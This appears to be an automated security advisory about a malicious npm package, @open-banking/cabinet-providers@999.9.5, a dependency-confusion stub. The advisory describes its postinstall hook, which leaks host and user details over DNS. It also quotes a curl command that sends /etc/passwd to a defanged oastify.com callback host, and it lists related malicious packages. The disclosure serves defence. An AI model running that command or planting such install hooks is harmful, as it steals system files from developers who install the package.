@open-banking/cabinet-providers@999.9.5
Malicious code in @open-banking/cabinet-providers (npm)
Analysis
Dependency confusion stub (version 999.9.5, 820 bytes, scoped name shadowing @open-banking/cabinet-providers) with postinstall hook that exfiltrates system data to oastify[.]com attacker-controlled callback domain via two vectors: (1) node scripts/scream3gg.js hex-encodes hostname/homedir/username and sends each as DNS labels to nmd25sur8sjp60lm75dp67e2gtmkaayz[.]oastify[.]com, (2) curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf[.]oastify[.]com exfils the passwd file. Publisher is a throwaway iCloud identity. This is a dependency confusion supply-chain attack with data exfiltration — recommend immediate human writeup.
- analyzed by
- Leitwacht
- first seen
- May 29, 2026, 10:16 AM
- analyzed
- May 29, 2026, 09:46 PM
Related advisories
- @easy-entry/landing-routes@99.9.5
- @easy-entry/outside-registration-fop-navigator@99.9.5
- @easy-entry/routes@99.9.5
- @shell-cabinet/routes@99.9.5
- @shell-landing/routes@99.9.5
- @veertly/web-app@99.9.9
- @concerns/i18n@99.9.1
- @coterie-baby/common@99.9.1
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.